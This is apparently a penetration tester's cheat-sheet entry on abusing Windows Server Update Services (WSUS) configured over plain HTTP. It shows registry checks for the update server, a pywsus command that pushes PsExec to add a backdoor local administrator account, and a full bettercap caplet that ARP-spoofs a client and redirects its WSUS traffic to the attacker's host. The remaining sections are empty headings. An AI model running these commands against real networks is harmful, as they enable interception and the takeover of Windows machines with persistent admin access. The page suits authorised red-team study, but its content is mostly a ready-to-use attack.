# WSUS * ## HTTP MitM * * * * * Check: ``` PS > reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer WUServer REG_SZ http://wsus.megacorp.local:8530 PS > reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer UseWUServer REG_DWORD 0x1 ``` Exploit: ``` $ python3 pywsus.py --host $ATTACKER_IP --port 8530 --executable /home/snovvcrash/www/PsExec64.exe --command '/accepteula /s cmd.exe /c "net user testuser Passw0rd! /add && net localgroup Administrators testuser /add"' $ sudo ./bettercap --iface $INTERFACE --caplet wsus.cap ``` {% code title="wsus.cap" %} ```bash # Quick recon of the network net.probe on # Set the ARP spoofing set arp.spoof.targets $CLIENT_IP set arp.spoof.internal false set arp.spoof.fullduplex false # Re-route traffic aimed at the WSUS server set any.proxy.iface $INTERFACE set any.proxy.protocol TCP set any.proxy.src_address $WSUS_SERVER_IP set any.proxy.src_port 8530 set any.proxy.dst_address $ATTACKER_IP set any.proxy.dst_port 8530 # Control logging and verbosity events.ignore endpoint events.ignore net.sniff # Start the modules any.proxy on arp.spoof on net.sniff on ``` {% endcode %} ## Local Proxy (LPE) * ## WSUS + LDAPS NTLM Relay * ## Tools ### SharpWSUS * *